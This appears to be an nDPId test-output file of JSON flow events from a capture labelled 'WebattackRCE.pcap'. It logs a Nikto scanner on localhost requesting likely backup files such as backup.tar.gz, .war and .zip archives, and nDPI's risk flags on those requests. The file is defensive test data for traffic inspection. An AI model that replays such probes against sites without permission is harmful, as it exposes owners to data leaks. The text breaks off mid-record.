00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 